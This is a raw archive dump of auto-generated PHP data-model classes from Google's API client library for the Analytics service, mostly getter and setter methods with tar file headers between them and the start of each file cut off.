setBotFilteringEnabled($botFilteringEnabled) { $this->botFilteringEnabled = $botFilteringEnabled; } /** * @return bool */ public function getBotFilteringEnabled() { return $this->botFilteringEnabled; } /** * @param ProfileChildLink */ public function setChildLink(ProfileChildLink $childLink) { $this->childLink = $childLink; } /** * @return ProfileChildLink */ public function getChildLink() { return $this->childLink; } /** * @param string */ public function setCreated($created) { $this->created = $created; } /** * @return string */ public function getCreated() { return $this->created; } /** * @param string */ public function setCurrency($currency) { $this->currency = $currency; } /** * @return string */ public function getCurrency() { return $this->currency; } /** * @param string */ public function setDefaultPage($defaultPage) { $this->defaultPage = $defaultPage; } /** * @return string */ public function getDefaultPage() { return $this->defaultPage; } /** * @param bool */ public function setECommerceTracking($eCommerceTracking) { $this->eCommerceTracking = $eCommerceTracking; } /** * @return bool */ public function getECommerceTracking() { return $this->eCommerceTracking; } /** * @param bool */ public function setEnhancedECommerceTracking($enhancedECommerceTracking) { $this->enhancedECommerceTracking = $enhancedECommerceTracking; } /** * @return bool */ public function getEnhancedECommerceTracking() { return $this->enhancedECommerceTracking; } /** * @param string */ public function setExcludeQueryParameters($excludeQueryParameters) { $this->excludeQueryParameters = $excludeQueryParameters; } /** * @return string */ public function getExcludeQueryParameters() { return $this->excludeQueryParameters; } /** * @param string */ public function setId($id) { $this->id = $id; } /** * @return string */ public function getId() { return $this->id; } /** * @param string */ public function setInternalWebPropertyId($internalWebPropertyId) { $this->internalWebPropertyId = $internalWebPropertyId; } /** * @return string */ public function getInternalWebPropertyId() { return $this->internalWebPropertyId; } /** * @param string */ public function setKind($kind) { $this->kind = $kind; } /** * @return string */ public function getKind() { return $this->kind; } /** * @param string */ public function setName($name) { $this->name = $name; } /** * @return string */ public function getName() { return $this->name; } /** * @param ProfileParentLink */ public function setParentLink(ProfileParentLink $parentLink) { $this->parentLink = $parentLink; } /** * @return ProfileParentLink */ public function getParentLink() { return $this->parentLink; } /** * @param ProfilePermissions */ public function setPermissions(ProfilePermissions $permissions) { $this->permissions = $permissions; } /** * @return ProfilePermissions */ public function getPermissions() { return $this->permissions; } /** * @param string */ public function setSelfLink($selfLink) { $this->selfLink = $selfLink; } /** * @return string */ public function getSelfLink() { return $this->selfLink; } /** * @param string */ public function setSiteSearchCategoryParameters($siteSearchCategoryParameters) { $this->siteSearchCategoryParameters = $siteSearchCategoryParameters; } /** * @return string */ public function getSiteSearchCategoryParameters() { return $this->siteSearchCategoryParameters; } /** * @param string */ public function setSiteSearchQueryParameters($siteSearchQueryParameters) { $this->siteSearchQueryParameters = $siteSearchQueryParameters; } /** * @return string */ public function getSiteSearchQueryParameters() { return $this->siteSearchQueryParameters; } /** * @param bool */ public function setStarred($starred) { $this->starred = $starred; } /** * @return bool */ public function getStarred() { return $this->starred; } /** * @param bool */ public function setStripSiteSearchCategoryParameters($stripSiteSearchCategoryParameters) { $this->stripSiteSearchCategoryParameters = $stripSiteSearchCategoryParameters; } /** * @return bool */ public function getStripSiteSearchCategoryParameters() { return $this->stripSiteSearchCategoryParameters; } /** * @param bool */ public function setStripSiteSearchQueryParameters($stripSiteSearchQueryParameters) { $this->stripSiteSearchQueryParameters = $stripSiteSearchQueryParameters; } /** * @return bool */ public function getStripSiteSearchQueryParameters() { return $this->stripSiteSearchQueryParameters; } /** * @param string */ public function setTimezone($timezone) { $this->timezone = $timezone; } /** * @return string */ public function getTimezone() { return $this->timezone; } /** * @param string */ public function setType($type) { $this->type = $type; } /** * @return string */ public function getType() { return $this->type; } /** * @param string */ public function setUpdated($updated) { $this->updated = $updated; } /** * @return string */ public function getUpdated() { return $this->updated; } /** * @param string */ public function setWebPropertyId($webPropertyId) { $this->webPropertyId = $webPropertyId; } /** * @return string */ public function getWebPropertyId() { return $this->webPropertyId; } /** * @param string */ public function setWebsiteUrl($websiteUrl) { $this->websiteUrl = $websiteUrl; } /** * @return string */ public function getWebsiteUrl() { return $this->websiteUrl; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(Profile::class, 'Google_Service_Analytics_Profile'); google-api/vendor/google/apiclient-services/src/Analytics/McfData.php000064400000012605147600400120021655 0ustar00columnHeaders = $columnHeaders; } /** * @return McfDataColumnHeaders[] */ public function getColumnHeaders() { return $this->columnHeaders; } /** * @param bool */ public function setContainsSampledData($containsSampledData) { $this->containsSampledData = $containsSampledData; } /** * @return bool */ public function getContainsSampledData() { return $this->containsSampledData; } /** * @param string */ public function setId($id) { $this->id = $id; } /** * @return string */ public function getId() { return $this->id; } /** * @param int */ public function setItemsPerPage($itemsPerPage) { $this->itemsPerPage = $itemsPerPage; } /** * @return int */ public function getItemsPerPage() { return $this->itemsPerPage; } /** * @param string */ public function setKind($kind) { $this->kind = $kind; } /** * @return string */ public function getKind() { return $this->kind; } /** * @param string */ public function setNextLink($nextLink) { $this->nextLink = $nextLink; } /** * @return string */ public function getNextLink() { return $this->nextLink; } /** * @param string */ public function setPreviousLink($previousLink) { $this->previousLink = $previousLink; } /** * @return string */ public function getPreviousLink() { return $this->previousLink; } /** * @param McfDataProfileInfo */ public function setProfileInfo(McfDataProfileInfo $profileInfo) { $this->profileInfo = $profileInfo; } /** * @return McfDataProfileInfo */ public function getProfileInfo() { return $this->profileInfo; } /** * @param McfDataQuery */ public function setQuery(McfDataQuery $query) { $this->query = $query; } /** * @return McfDataQuery */ public function getQuery() { return $this->query; } /** * @param McfDataRows[] */ public function setRows($rows) { $this->rows = $rows; } /** * @return McfDataRows[] */ public function getRows() { return $this->rows; } /** * @param string */ public function setSampleSize($sampleSize) { $this->sampleSize = $sampleSize; } /** * @return string */ public function getSampleSize() { return $this->sampleSize; } /** * @param string */ public function setSampleSpace($sampleSpace) { $this->sampleSpace = $sampleSpace; } /** * @return string */ public function getSampleSpace() { return $this->sampleSpace; } /** * @param string */ public function setSelfLink($selfLink) { $this->selfLink = $selfLink; } /** * @return string */ public function getSelfLink() { return $this->selfLink; } /** * @param int */ public function setTotalResults($totalResults) { $this->totalResults = $totalResults; } /** * @return int */ public function getTotalResults() { return $this->totalResults; } /** * @param string[] */ public function setTotalsForAllResults($totalsForAllResults) { $this->totalsForAllResults = $totalsForAllResults; } /** * @return string[] */ public function getTotalsForAllResults() { return $this->totalsForAllResults; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(McfData::class, 'Google_Service_Analytics_McfData'); google-api/vendor/google/apiclient-services/src/Analytics/CustomDataSourceParentLink.php000064400000002505147600400120025571 0ustar00href = $href; } /** * @return string */ public function getHref() { return $this->href; } /** * @param string */ public function setType($type) { $this->type = $type; } /** * @return string */ public function getType() { return $this->type; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(CustomDataSourceParentLink::class, 'Google_Service_Analytics_CustomDataSourceParentLink'); google-api/vendor/google/apiclient-services/src/Analytics/McfDataRowsConversionPathValue.php000064400000002701147600400120026404 0ustar00interactionType = $interactionType; } /** * @return string */ public function getInteractionType() { return $this->interactionType; } /** * @param string */ public function setNodeValue($nodeValue) { $this->nodeValue = $nodeValue; } /** * @return string */ public function getNodeValue() { return $this->nodeValue; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(McfDataRowsConversionPathValue::class, 'Google_Service_Analytics_McfDataRowsConversionPathValue'); google-api/vendor/google/apiclient-services/src/Analytics/FilterRef.php000064400000003745147600400120022245 0ustar00accountId = $accountId; } /** * @return string */ public function getAccountId() { return $this->accountId; } /** * @param string */ public function setHref($href) { $this->href = $href; } /** * @return string */ public function getHref() { return $this->href; } /** * @param string */ public function setId($id) { $this->id = $id; } /** * @return string */ public function getId() { return $this->id; } /** * @param string */ public function setKind($kind) { $this->kind = $kind; } /** * @return string */ public function getKind() { return $this->kind; } /** * @param string */ public function setName($name) { $this->name = $name; } /** * @return string */ public function getName() { return $this->name; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(FilterRef::class, 'Google_Service_Analytics_FilterRef'); google-api/vendor/google/apiclient-services/src/Analytics/AccountPermissions.php000064400000002234147600400120024203 0ustar00effective = $effective; } /** * @return string[] */ public function getEffective() { return $this->effective; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(AccountPermissions::class, 'Google_Service_Analytics_AccountPermissions'); google-api/vendor/google/apiclient-services/src/Analytics/UserRef.php000064400000002757147600400120021740 0ustar00email = $email; } /** * @return string */ public function getEmail() { return $this->email; } /** * @param string */ public function setId($id) { $this->id = $id; } /** * @return string */ public function getId() { return $this->id; } /** * @param string */ public function setKind($kind) { $this->kind = $kind; } /** * @return string */ public function getKind() { return $this->kind; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(UserRef::class, 'Google_Service_Analytics_UserRef'); google-api/vendor/google/apiclient-services/src/Analytics/CustomMetrics.php000064400000006050147600400120023154 0ustar00items = $items; } /** * @return CustomMetric[] */ public function getItems() { return $this->items; } /** * @param int */ public function setItemsPerPage($itemsPerPage) { $this->itemsPerPage = $itemsPerPage; } /** * @return int */ public function getItemsPerPage() { return $this->itemsPerPage; } /** * @param string */ public function setKind($kind) { $this->kind = $kind; } /** * @return string */ public function getKind() { return $this->kind; } /** * @param string */ public function setNextLink($nextLink) { $this->nextLink = $nextLink; } /** * @return string */ public function getNextLink() { return $this->nextLink; } /** * @param string */ public function setPreviousLink($previousLink) { $this->previousLink = $previousLink; } /** * @return string */ public function getPreviousLink() { return $this->previousLink; } /** * @param int */ public function setStartIndex($startIndex) { $this->startIndex = $startIndex; } /** * @return int */ public function getStartIndex() { return $this->startIndex; } /** * @param int */ public function setTotalResults($totalResults) { $this->totalResults = $totalResults; } /** * @return int */ public function getTotalResults() { return $this->totalResults; } /** * @param string */ public function setUsername($username) { $this->username = $username; } /** * @return string */ public function getUsername() { return $this->username; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(CustomMetrics::class, 'Google_Service_Analytics_CustomMetrics'); google-api/vendor/google/apiclient-services/src/Analytics/Filters.php000064400000005776147600400120022001 0ustar00items = $items; } /** * @return Filter[] */ public function getItems() { return $this->items; } /** * @param int */ public function setItemsPerPage($itemsPerPage) { $this->itemsPerPage = $itemsPerPage; } /** * @return int */ public function getItemsPerPage() { return $this->itemsPerPage; } /** * @param string */ public function setKind($kind) { $this->kind = $kind; } /** * @return string */ public function getKind() { return $this->kind; } /** * @param string */ public function setNextLink($nextLink) { $this->nextLink = $nextLink; } /** * @return string */ public function getNextLink() { return $this->nextLink; } /** * @param string */ public function setPreviousLink($previousLink) { $this->previousLink = $previousLink; } /** * @return string */ public function getPreviousLink() { return $this->previousLink; } /** * @param int */ public function setStartIndex($startIndex) { $this->startIndex = $startIndex; } /** * @return int */ public function getStartIndex() { return $this->startIndex; } /** * @param int */ public function setTotalResults($totalResults) { $this->totalResults = $totalResults; } /** * @return int */ public function getTotalResults() { return $this->totalResults; } /** * @param string */ public function setUsername($username) { $this->username = $username; } /** * @return string */ public function getUsername() { return $this->username; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(Filters::class, 'Google_Service_Analytics_Filters'); google-api/vendor/google/apiclient-services/src/Analytics/EntityUserLinks.php000064400000005460147600400120023473 0ustar00items = $items; } /** * @return EntityUserLink[] */ public function getItems() { return $this->items; } /** * @param int */ public function setItemsPerPage($itemsPerPage) { $this->itemsPerPage = $itemsPerPage; } /** * @return int */ public function getItemsPerPage() { return $this->itemsPerPage; } /** * @param string */ public function setKind($kind) { $this->kind = $kind; } /** * @return string */ public function getKind() { return $this->kind; } /** * @param string */ public function setNextLink($nextLink) { $this->nextLink = $nextLink; } /** * @return string */ public function getNextLink() { return $this->nextLink; } /** * @param string */ public function setPreviousLink($previousLink) { $this->previousLink = $previousLink; } /** * @return string */ public function getPreviousLink() { return $this->previousLink; } /** * @param int */ public function setStartIndex($startIndex) { $this->startIndex = $startIndex; } /** * @return int */ public function getStartIndex() { return $this->startIndex; } /** * @param int */ public function setTotalResults($totalResults) { $this->totalResults = $totalResults; } /** * @return int */ public function getTotalResults() { return $this->totalResults; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(EntityUserLinks::class, 'Google_Service_Analytics_EntityUserLinks'); google-api/vendor/google/apiclient-services/src/Analytics/GoalUrlDestinationDetailsSteps.php000064400000003071147600400120026447 0ustar00name = $name; } /** * @return string */ public function getName() { return $this->name; } /** * @param int */ public function setNumber($number) { $this->number = $number; } /** * @return int */ public function getNumber() { return $this->number; } /** * @param string */ public function setUrl($url) { $this->url = $url; } /** * @return string */ public function getUrl() { return $this->url; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(GoalUrlDestinationDetailsSteps::class, 'Google_Service_Analytics_GoalUrlDestinationDetailsSteps'); google-api/vendor/google/apiclient-services/src/Analytics/FilterExpression.php000064400000004640147600400120023663 0ustar00caseSensitive = $caseSensitive; } /** * @return bool */ public function getCaseSensitive() { return $this->caseSensitive; } /** * @param string */ public function setExpressionValue($expressionValue) { $this->expressionValue = $expressionValue; } /** * @return string */ public function getExpressionValue() { return $this->expressionValue; } /** * @param string */ public function setField($field) { $this->field = $field; } /** * @return string */ public function getField() { return $this->field; } /** * @param int */ public function setFieldIndex($fieldIndex) { $this->fieldIndex = $fieldIndex; } /** * @return int */ public function getFieldIndex() { return $this->fieldIndex; } /** * @param string */ public function setKind($kind) { $this->kind = $kind; } /** * @return string */ public function getKind() { return $this->kind; } /** * @param string */ public function setMatchType($matchType) { $this->matchType = $matchType; } /** * @return string */ public function getMatchType() { return $this->matchType; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(FilterExpression::class, 'Google_Service_Analytics_FilterExpression'); google-api/vendor/google/apiclient-services/src/Analytics/CustomDataSources.php000064400000006104147600400120023763 0ustar00items = $items; } /** * @return CustomDataSource[] */ public function getItems() { return $this->items; } /** * @param int */ public function setItemsPerPage($itemsPerPage) { $this->itemsPerPage = $itemsPerPage; } /** * @return int */ public function getItemsPerPage() { return $this->itemsPerPage; } /** * @param string */ public function setKind($kind) { $this->kind = $kind; } /** * @return string */ public function getKind() { return $this->kind; } /** * @param string */ public function setNextLink($nextLink) { $this->nextLink = $nextLink; } /** * @return string */ public function getNextLink() { return $this->nextLink; } /** * @param string */ public function setPreviousLink($previousLink) { $this->previousLink = $previousLink; } /** * @return string */ public function getPreviousLink() { return $this->previousLink; } /** * @param int */ public function setStartIndex($startIndex) { $this->startIndex = $startIndex; } /** * @return int */ public function getStartIndex() { return $this->startIndex; } /** * @param int */ public function setTotalResults($totalResults) { $this->totalResults = $totalResults; } /** * @return int */ public function getTotalResults() { return $this->totalResults; } /** * @param string */ public function setUsername($username) { $this->username = $username; } /** * @return string */ public function getUsername() { return $this->username; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(CustomDataSources::class, 'Google_Service_Analytics_CustomDataSources'); google-api/vendor/google/apiclient-services/src/Analytics/ProfileFilterLinks.php000064400000006113147600400120024122 0ustar00items = $items; } /** * @return ProfileFilterLink[] */ public function getItems() { return $this->items; } /** * @param int */ public function setItemsPerPage($itemsPerPage) { $this->itemsPerPage = $itemsPerPage; } /** * @return int */ public function getItemsPerPage() { return $this->itemsPerPage; } /** * @param string */ public function setKind($kind) { $this->kind = $kind; } /** * @return string */ public function getKind() { return $this->kind; } /** * @param string */ public function setNextLink($nextLink) { $this->nextLink = $nextLink; } /** * @return string */ public function getNextLink() { return $this->nextLink; } /** * @param string */ public function setPreviousLink($previousLink) { $this->previousLink = $previousLink; } /** * @return string */ public function getPreviousLink() { return $this->previousLink; } /** * @param int */ public function setStartIndex($startIndex) { $this->startIndex = $startIndex; } /** * @return int */ public function getStartIndex() { return $this->startIndex; } /** * @param int */ public function setTotalResults($totalResults) { $this->totalResults = $totalResults; } /** * @return int */ public function getTotalResults() { return $this->totalResults; } /** * @param string */ public function setUsername($username) { $this->username = $username; } /** * @return string */ public function getUsername() { return $this->username; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(ProfileFilterLinks::class, 'Google_Service_Analytics_ProfileFilterLinks'); google-api/vendor/google/apiclient-services/src/Analytics/GaDataQuery.php000064400000007545147600400120022534 0ustar00 "end-date", "maxResults" => "max-results", "startDate" => "start-date", "startIndex" => "start-index", ]; /** * @var string */ public $dimensions; /** * @var string */ public $endDate; /** * @var string */ public $filters; /** * @var string */ public $ids; /** * @var int */ public $maxResults; /** * @var string[] */ public $metrics; /** * @var string */ public $samplingLevel; /** * @var string */ public $segment; /** * @var string[] */ public $sort; /** * @var string */ public $startDate; /** * @var int */ public $startIndex; /** * @param string */ public function setDimensions($dimensions) { $this->dimensions = $dimensions; } /** * @return string */ public function getDimensions() { return $this->dimensions; } /** * @param string */ public function setEndDate($endDate) { $this->endDate = $endDate; } /** * @return string */ public function getEndDate() { return $this->endDate; } /** * @param string */ public function setFilters($filters) { $this->filters = $filters; } /** * @return string */ public function getFilters() { return $this->filters; } /** * @param string */ public function setIds($ids) { $this->ids = $ids; } /** * @return string */ public function getIds() { return $this->ids; } /** * @param int */ public function setMaxResults($maxResults) { $this->maxResults = $maxResults; } /** * @return int */ public function getMaxResults() { return $this->maxResults; } /** * @param string[] */ public function setMetrics($metrics) { $this->metrics = $metrics; } /** * @return string[] */ public function getMetrics() { return $this->metrics; } /** * @param string */ public function setSamplingLevel($samplingLevel) { $this->samplingLevel = $samplingLevel; } /** * @return string */ public function getSamplingLevel() { return $this->samplingLevel; } /** * @param string */ public function setSegment($segment) { $this->segment = $segment; } /** * @return string */ public function getSegment() { return $this->segment; } /** * @param string[] */ public function setSort($sort) { $this->sort = $sort; } /** * @return string[] */ public function getSort() { return $this->sort; } /** * @param string */ public function setStartDate($startDate) { $this->startDate = $startDate; } /** * @return string */ public function getStartDate() { return $this->startDate; } /** * @param int */ public function setStartIndex($startIndex) { $this->startIndex = $startIndex; } /** * @return int */ public function getStartIndex() { return $this->startIndex; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(GaDataQuery::class, 'Google_Service_Analytics_GaDataQuery'); google-api/vendor/google/apiclient-services/src/Analytics/EntityAdWordsLink.php000064400000005665147600400120023744 0ustar00adWordsAccounts = $adWordsAccounts; } /** * @return AdWordsAccount[] */ public function getAdWordsAccounts() { return $this->adWordsAccounts; } /** * @param EntityAdWordsLinkEntity */ public function setEntity(EntityAdWordsLinkEntity $entity) { $this->entity = $entity; } /** * @return EntityAdWordsLinkEntity */ public function getEntity() { return $this->entity; } /** * @param string */ public function setId($id) { $this->id = $id; } /** * @return string */ public function getId() { return $this->id; } /** * @param string */ public function setKind($kind) { $this->kind = $kind; } /** * @return string */ public function getKind() { return $this->kind; } /** * @param string */ public function setName($name) { $this->name = $name; } /** * @return string */ public function getName() { return $this->name; } /** * @param string[] */ public function setProfileIds($profileIds) { $this->profileIds = $profileIds; } /** * @return string[] */ public function getProfileIds() { return $this->profileIds; } /** * @param string */ public function setSelfLink($selfLink) { $this->selfLink = $selfLink; } /** * @return string */ public function getSelfLink() { return $this->selfLink; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(EntityAdWordsLink::class, 'Google_Service_Analytics_EntityAdWordsLink'); google-api/vendor/google/apiclient-services/src/Analytics/EntityAdWordsLinks.php000064400000005505147600400120024120 0ustar00items = $items; } /** * @return EntityAdWordsLink[] */ public function getItems() { return $this->items; } /** * @param int */ public function setItemsPerPage($itemsPerPage) { $this->itemsPerPage = $itemsPerPage; } /** * @return int */ public function getItemsPerPage() { return $this->itemsPerPage; } /** * @param string */ public function setKind($kind) { $this->kind = $kind; } /** * @return string */ public function getKind() { return $this->kind; } /** * @param string */ public function setNextLink($nextLink) { $this->nextLink = $nextLink; } /** * @return string */ public function getNextLink() { return $this->nextLink; } /** * @param string */ public function setPreviousLink($previousLink) { $this->previousLink = $previousLink; } /** * @return string */ public function getPreviousLink() { return $this->previousLink; } /** * @param int */ public function setStartIndex($startIndex) { $this->startIndex = $startIndex; } /** * @return int */ public function getStartIndex() { return $this->startIndex; } /** * @param int */ public function setTotalResults($totalResults) { $this->totalResults = $totalResults; } /** * @return int */ public function getTotalResults() { return $this->totalResults; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(EntityAdWordsLinks::class, 'Google_Service_Analytics_EntityAdWordsLinks'); google-api/vendor/google/apiclient-services/src/Analytics/GoalUrlDestinationDetails.php000064400000004621147600400120025432 0ustar00caseSensitive = $caseSensitive; } /** * @return bool */ public function getCaseSensitive() { return $this->caseSensitive; } /** * @param bool */ public function setFirstStepRequired($firstStepRequired) { $this->firstStepRequired = $firstStepRequired; } /** * @return bool */ public function getFirstStepRequired() { return $this->firstStepRequired; } /** * @param string */ public function setMatchType($matchType) { $this->matchType = $matchType; } /** * @return string */ public function getMatchType() { return $this->matchType; } /** * @param GoalUrlDestinationDetailsSteps[] */ public function setSteps($steps) { $this->steps = $steps; } /** * @return GoalUrlDestinationDetailsSteps[] */ public function getSteps() { return $this->steps; } /** * @param string */ public function setUrl($url) { $this->url = $url; } /** * @return string */ public function getUrl() { return $this->url; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(GoalUrlDestinationDetails::class, 'Google_Service_Analytics_GoalUrlDestinationDetails'); google-api/vendor/google/apiclient-services/src/Analytics/GaDataDataTableCols.php000064400000003023147600400120024054 0ustar00id = $id; } /** * @return string */ public function getId() { return $this->id; } /** * @param string */ public function setLabel($label) { $this->label = $label; } /** * @return string */ public function getLabel() { return $this->label; } /** * @param string */ public function setType($type) { $this->type = $type; } /** * @return string */ public function getType() { return $this->type; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(GaDataDataTableCols::class, 'Google_Service_Analytics_GaDataDataTableCols'); vendor/google/apiclient-services/src/Analytics/AnalyticsDataimportDeleteUploadDataRequest.php000064400000002474147600400120030711 0ustar00google-apicustomDataImportUids = $customDataImportUids; } /** * @return string[] */ public function getCustomDataImportUids() { return $this->customDataImportUids; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(AnalyticsDataimportDeleteUploadDataRequest::class, 'Google_Service_Analytics_AnalyticsDataimportDeleteUploadDataRequest'); google-api/vendor/google/apiclient-services/src/Analytics/RealtimeData.php000064400000007275147600400120022721 0ustar00columnHeaders = $columnHeaders; } /** * @return RealtimeDataColumnHeaders[] */ public function getColumnHeaders() { return $this->columnHeaders; } /** * @param string */ public function setId($id) { $this->id = $id; } /** * @return string */ public function getId() { return $this->id; } /** * @param string */ public function setKind($kind) { $this->kind = $kind; } /** * @return string */ public function getKind() { return $this->kind; } /** * @param RealtimeDataProfileInfo */ public function setProfileInfo(RealtimeDataProfileInfo $profileInfo) { $this->profileInfo = $profileInfo; } /** * @return RealtimeDataProfileInfo */ public function getProfileInfo() { return $this->profileInfo; } /** * @param RealtimeDataQuery */ public function setQuery(RealtimeDataQuery $query) { $this->query = $query; } /** * @return RealtimeDataQuery */ public function getQuery() { return $this->query; } /** * @param string[] */ public function setRows($rows) { $this->rows = $rows; } /** * @return string[] */ public function getRows() { return $this->rows; } /** * @param string */ public function setSelfLink($selfLink) { $this->selfLink = $selfLink; } /** * @return string */ public function getSelfLink() { return $this->selfLink; } /** * @param int */ public function setTotalResults($totalResults) { $this->totalResults = $totalResults; } /** * @return int */ public function getTotalResults() { return $this->totalResults; } /** * @param string[] */ public function setTotalsForAllResults($totalsForAllResults) { $this->totalsForAllResults = $totalsForAllResults; } /** * @return string[] */ public function getTotalsForAllResults() { return $this->totalsForAllResults; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(RealtimeData::class, 'Google_Service_Analytics_RealtimeData'); google-api/vendor/google/apiclient-services/src/Analytics/Experiments.php000064400000006032147600400120022656 0ustar00items = $items; } /** * @return Experiment[] */ public function getItems() { return $this->items; } /** * @param int */ public function setItemsPerPage($itemsPerPage) { $this->itemsPerPage = $itemsPerPage; } /** * @return int */ public function getItemsPerPage() { return $this->itemsPerPage; } /** * @param string */ public function setKind($kind) { $this->kind = $kind; } /** * @return string */ public function getKind() { return $this->kind; } /** * @param string */ public function setNextLink($nextLink) { $this->nextLink = $nextLink; } /** * @return string */ public function getNextLink() { return $this->nextLink; } /** * @param string */ public function setPreviousLink($previousLink) { $this->previousLink = $previousLink; } /** * @return string */ public function getPreviousLink() { return $this->previousLink; } /** * @param int */ public function setStartIndex($startIndex) { $this->startIndex = $startIndex; } /** * @return int */ public function getStartIndex() { return $this->startIndex; } /** * @param int */ public function setTotalResults($totalResults) { $this->totalResults = $totalResults; } /** * @return int */ public function getTotalResults() { return $this->totalResults; } /** * @param string */ public function setUsername($username) { $this->username = $username; } /** * @return string */ public function getUsername() { return $this->username; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(Experiments::class, 'Google_Service_Analytics_Experiments'); google-api/vendor/google/apiclient-services/src/Analytics/Filter.php000064400000014054147600400120021603 0ustar00accountId = $accountId; } /** * @return string */ public function getAccountId() { return $this->accountId; } /** * @param FilterAdvancedDetails */ public function setAdvancedDetails(FilterAdvancedDetails $advancedDetails) { $this->advancedDetails = $advancedDetails; } /** * @return FilterAdvancedDetails */ public function getAdvancedDetails() { return $this->advancedDetails; } /** * @param string */ public function setCreated($created) { $this->created = $created; } /** * @return string */ public function getCreated() { return $this->created; } /** * @param FilterExpression */ public function setExcludeDetails(FilterExpression $excludeDetails) { $this->excludeDetails = $excludeDetails; } /** * @return FilterExpression */ public function getExcludeDetails() { return $this->excludeDetails; } /** * @param string */ public function setId($id) { $this->id = $id; } /** * @return string */ public function getId() { return $this->id; } /** * @param FilterExpression */ public function setIncludeDetails(FilterExpression $includeDetails) { $this->includeDetails = $includeDetails; } /** * @return FilterExpression */ public function getIncludeDetails() { return $this->includeDetails; } /** * @param string */ public function setKind($kind) { $this->kind = $kind; } /** * @return string */ public function getKind() { return $this->kind; } /** * @param FilterLowercaseDetails */ public function setLowercaseDetails(FilterLowercaseDetails $lowercaseDetails) { $this->lowercaseDetails = $lowercaseDetails; } /** * @return FilterLowercaseDetails */ public function getLowercaseDetails() { return $this->lowercaseDetails; } /** * @param string */ public function setName($name) { $this->name = $name; } /** * @return string */ public function getName() { return $this->name; } /** * @param FilterParentLink */ public function setParentLink(FilterParentLink $parentLink) { $this->parentLink = $parentLink; } /** * @return FilterParentLink */ public function getParentLink() { return $this->parentLink; } /** * @param FilterSearchAndReplaceDetails */ public function setSearchAndReplaceDetails(FilterSearchAndReplaceDetails $searchAndReplaceDetails) { $this->searchAndReplaceDetails = $searchAndReplaceDetails; } /** * @return FilterSearchAndReplaceDetails */ public function getSearchAndReplaceDetails() { return $this->searchAndReplaceDetails; } /** * @param string */ public function setSelfLink($selfLink) { $this->selfLink = $selfLink; } /** * @return string */ public function getSelfLink() { return $this->selfLink; } /** * @param string */ public function setType($type) { $this->type = $type; } /** * @return string */ public function getType() { return $this->type; } /** * @param string */ public function setUpdated($updated) { $this->updated = $updated; } /** * @return string */ public function getUpdated() { return $this->updated; } /** * @param FilterUppercaseDetails */ public function setUppercaseDetails(FilterUppercaseDetails $uppercaseDetails) { $this->uppercaseDetails = $uppercaseDetails; } /** * @return FilterUppercaseDetails */ public function getUppercaseDetails() { return $this->uppercaseDetails; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(Filter::class, 'Google_Service_Analytics_Filter'); google-api/vendor/google/apiclient-services/src/Analytics/GaData.php000064400000013753147600400120021504 0ustar00columnHeaders = $columnHeaders; } /** * @return GaDataColumnHeaders[] */ public function getColumnHeaders() { return $this->columnHeaders; } /** * @param bool */ public function setContainsSampledData($containsSampledData) { $this->containsSampledData = $containsSampledData; } /** * @return bool */ public function getContainsSampledData() { return $this->containsSampledData; } /** * @param string */ public function setDataLastRefreshed($dataLastRefreshed) { $this->dataLastRefreshed = $dataLastRefreshed; } /** * @return string */ public function getDataLastRefreshed() { return $this->dataLastRefreshed; } /** * @param GaDataDataTable */ public function setDataTable(GaDataDataTable $dataTable) { $this->dataTable = $dataTable; } /** * @return GaDataDataTable */ public function getDataTable() { return $this->dataTable; } /** * @param string */ public function setId($id) { $this->id = $id; } /** * @return string */ public function getId() { return $this->id; } /** * @param int */ public function setItemsPerPage($itemsPerPage) { $this->itemsPerPage = $itemsPerPage; } /** * @return int */ public function getItemsPerPage() { return $this->itemsPerPage; } /** * @param string */ public function setKind($kind) { $this->kind = $kind; } /** * @return string */ public function getKind() { return $this->kind; } /** * @param string */ public function setNextLink($nextLink) { $this->nextLink = $nextLink; } /** * @return string */ public function getNextLink() { return $this->nextLink; } /** * @param string */ public function setPreviousLink($previousLink) { $this->previousLink = $previousLink; } /** * @return string */ public function getPreviousLink() { return $this->previousLink; } /** * @param GaDataProfileInfo */ public function setProfileInfo(GaDataProfileInfo $profileInfo) { $this->profileInfo = $profileInfo; } /** * @return GaDataProfileInfo */ public function getProfileInfo() { return $this->profileInfo; } /** * @param GaDataQuery */ public function setQuery(GaDataQuery $query) { $this->query = $query; } /** * @return GaDataQuery */ public function getQuery() { return $this->query; } /** * @param string[] */ public function setRows($rows) { $this->rows = $rows; } /** * @return string[] */ public function getRows() { return $this->rows; } /** * @param string */ public function setSampleSize($sampleSize) { $this->sampleSize = $sampleSize; } /** * @return string */ public function getSampleSize() { return $this->sampleSize; } /** * @param string */ public function setSampleSpace($sampleSpace) { $this->sampleSpace = $sampleSpace; } /** * @return string */ public function getSampleSpace() { return $this->sampleSpace; } /** * @param string */ public function setSelfLink($selfLink) { $this->selfLink = $selfLink; } /** * @return string */ public function getSelfLink() { return $this->selfLink; } /** * @param int */ public function setTotalResults($totalResults) { $this->totalResults = $totalResults; } /** * @return int */ public function getTotalResults() { return $this->totalResults; } /** * @param string[] */ public function setTotalsForAllResults($totalsForAllResults) { $this->totalsForAllResults = $totalsForAllResults; } /** * @return string[] */ public function getTotalsForAllResults() { return $this->totalsForAllResults; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(GaData::class, 'Google_Service_Analytics_GaData'); 